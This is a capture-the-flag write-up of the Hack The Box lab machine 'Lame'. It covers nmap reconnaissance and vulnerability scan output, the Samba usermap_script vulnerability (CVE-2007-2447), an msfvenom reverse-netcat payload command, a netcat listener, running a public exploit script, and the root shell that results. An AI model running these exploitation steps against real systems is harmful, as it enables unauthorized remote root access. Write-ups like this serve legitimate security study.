Hack the Box Lame

My write-up on HTB’s retired machine “Lame”

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

Launching nmapAutomator that automates our recon/enumeration.

nmap -Pn -sCV -p21,22,139,445 -oN nmap/Basic_10.10.10.3.nmap
10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.10s latency).
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
**Vulnerability Information**
nmap -Pn -sV — script vuln -p21,22,139,445,3632, -oN nmap/Vul
ns_10.10.10.3.nmap 10.10.10.3
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011–1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010–4478 7.5 https://vulners.com/cve/CVE-2010–4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016–10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010–4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008–5161 2.6 https://vulners.com/cve/CVE-2008-5161
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4–1ubuntu4))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| distcc-cve2004–2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004–2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002–02–01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004–2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ports and services that needed to be enumerated further:

• 21/tcp open ftp vsftpd 2.3.4
• 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
• 139/tcp open netbios-ssn Samba smbd 3.X — 4.X
• 445/tcp open netbios-ssn Samba smbd 3.X — 4.X
• 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4–1ubuntu4))

Enumeration

Checking the results of nmapAutomator, we can start with SMB and see what we information we have.

SMBMAP result

SMBmap revealed that we have READ and WRITE access to /tmp

Diving more in our SMB findings, let’s search Google for available exploits related to “samba 3.0.20 Debian”

Exploitation

Exploiting samba 3.0.20 debian

Using Metasploit

Name: Samba “username map script” Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007–05–14

Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
“username map script” configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!

References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html

Exploiting samba 3.0.20 debian

Manual exploit

Found a python script samba-usermap-exploit.py that leveraged the samba vulnerability.

Before editing the python script, we need to create our payload. A simple payload can be created as such:

#msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.10.14.5 LPORT=4444 -f python

Edit samba-usermap-exploit.py and paste your newly payload.

Save the python script, setup listener, and run

nc -nlvp 4444 (2nd terminal screen)

python samba-usermap-exploit.py 10.10.10.3 (1st terminal screen)

python samba-usermap-exploit.py 10.10.10.3
nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 36890
whoami
root
hostname
lame
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:e2:fa 
 inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
 inet6 addr: dead:beef::250:56ff:feb9:e2fa/64 Scope:Global
 inet6 addr: fe80::250:56ff:feb9:e2fa/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:195592 errors:49 dropped:70 overruns:0 frame:0
 TX packets:3665 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:13940860 (13.2 MB) TX bytes:430809 (420.7 KB)
 Interrupt:19 Base address:0x2000 
lo Link encap:Local Loopback 
 inet addr:127.0.0.1 Mask:255.0.0.0
 inet6 addr: ::1/128 Scope:Host
 UP LOOPBACK RUNNING MTU:16436 Metric:1
 RX packets:22187 errors:0 dropped:0 overruns:0 frame:0
 TX packets:22187 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0 
 RX bytes:11030705 (10.5 MB) TX bytes:11030705 (10.5 MB)distccd distccd v1 exploit

The exploit worked and we have root privilege.

Lessons Learned

• Understand exploits that you find and do not run them arbitrarily assuming “it should work”.
• Getting familiar creating payloads using Msfvenom
• As always, keep your systems up-to-date on patches.

References:

1. https://www.offensive-security.com/metasploit-unleashed/msfvenom/
2. https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851#file-samba-usermap-exploit-py